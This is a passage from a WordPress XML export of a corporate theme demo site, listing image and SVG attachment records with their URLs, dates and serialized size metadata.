		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:530;s:6:"height";i:500;s:4:"file";s:32:"2020/09/image1-single-team.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:32:"image1-single-team-1-300x283.jpg";s:5:"width";i:300;s:6:"height";i:283;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"image1-single-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"image1-single-team-1-530x400.jpg";s:5:"width";i:530;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/blog/pheader-blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>770</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-blog]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>768</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-blog.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/09/pheader-blog.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-blog-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-blog-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-blog-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-blog-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-blog-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-blog-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-blog-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-blog-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/pheader-project/</link>
		<pubDate>Thu, 10 Sep 2020 10:20:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>774</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:20:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:20:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-project]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-project.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:29:"2020/09/pheader-project.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:28:"pheader-project-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"pheader-project-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"pheader-project-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"pheader-project-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:30:"pheader-project-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-project-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"pheader-project-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"pheader-project-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:30:"pheader-project-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/project-slide-1/</link>
		<pubDate>Thu, 10 Sep 2020 10:41:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>778</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:41:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:41:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/project-details/</link>
		<pubDate>Fri, 11 Sep 2020 03:07:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-details.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>780</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:07:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:07:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-details]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-details.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-details.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:620;s:4:"file";s:29:"2020/09/project-details.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:29:"project-details-1-300x158.jpg";s:5:"width";i:300;s:6:"height";i:158;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"project-details-1-1024x541.jpg";s:5:"width";i:1024;s:6:"height";i:541;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-details-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-details-1-768x406.jpg";s:5:"width";i:768;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"project-details-1-1174x600.jpg";s:5:"width";i:1174;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>black-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/black-circle/</link>
		<pubDate>Fri, 11 Sep 2020 03:20:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/black-circle.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>782</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:20:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:20:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[black-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/black-circle.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/black-circle.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-10</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/retirement-plan/project-10/</link>
		<pubDate>Fri, 11 Sep 2020 04:32:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-10.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>800</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:32:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:32:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-10]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>797</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-10.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-10.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:24:"2020/09/project-10.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-10-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-10-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-10-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-10-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-12</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-planning/project-12/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-12.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>803</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-12]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>802</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-12.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-12.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:24:"2020/09/project-12.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-12-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-12-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-12-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-12-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-12-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-11</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/money-market/project-11/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-11.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>807</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-11]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>806</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-11.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-11.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:24:"2020/09/project-11.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"project-11-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"project-11-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"project-11-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"project-11-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"project-11-1-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-9</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/oct-analytics/project-9/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-9.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>811</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-9]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>810</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-9.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-9.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
